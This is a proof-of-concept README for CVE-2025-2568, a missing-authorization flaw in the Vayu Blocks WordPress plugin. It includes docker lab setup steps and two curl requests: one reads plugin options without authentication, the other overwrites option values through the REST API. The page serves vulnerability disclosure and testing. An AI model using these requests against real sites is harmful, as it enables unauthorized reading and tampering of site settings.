CVE-2025-2568 PoC — Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce 1.0.4 - 1.2.1 - Missing Authorization to Unauthenticated Limi

Source

Associated Vulnerability

Description

Proof of Concept for CVE-2025-2568

Readme

# PoC CVE-2025-2568

### Overview
The **Vayu Blocks – Gutenberg Blocks** for WordPress & WooCommerce plugin for WordPress is vulnerable to **unauthorized access** and **modification** of data due to missing capability checks on the `vayu_blocks_get_toggle_switch_values_callback` and `vayu_blocks_save_toggle_switch_callback` function in versions `1.0.4` to `1.2.1`. This makes it possible for unauthenticated attackers to read plugin options and update any option with a key name ending in `_value`.

### Exploitation Steps
#### Setup (using docker)
1. Clone the repo and follow the steps:
   ```
   cd vuln-wordpress
   docker-compose up -d
   ```
2. Unzip the Vayu-Plugin inside the wp-content/plugins folder.
   ```
   cd wp-content/plugins/
   unzip vayu-blocks.1.2.0.zip
   ```
   The Vayu-blocks plugin (version 1.2.0) is now installed.

#### Exploit:
1. Use this to read the options:
   ```
   curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
   ```
2. Send a POST request like this to modify the option values.
   ```
   curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
    -H "Content-Type: application/json" \
    -d '{"key":"container", "value":"new_value"}'
   ```

### Exploit Video
[wordpressexploit.webm](https://github.com/user-attachments/assets/45ac12b1-f6b1-4da3-8afa-eea4960c5212)

File Snapshot

 [4.0K]  /data/pocs/66122289fdec62411eb88836af6d1b7387582dcc
├── [1.1K]  LICENSE
├── [1.3K]  README.md
└── [4.0K]  vuln-wordpress
    ├── [ 571]  docker-compose.yml
    └── [4.0K]  wp-content
        └── [4.0K]  plugins
            └── [2.6M]  vayu-blocks.1.2.0.zip

4 directories, 4 files

Remarks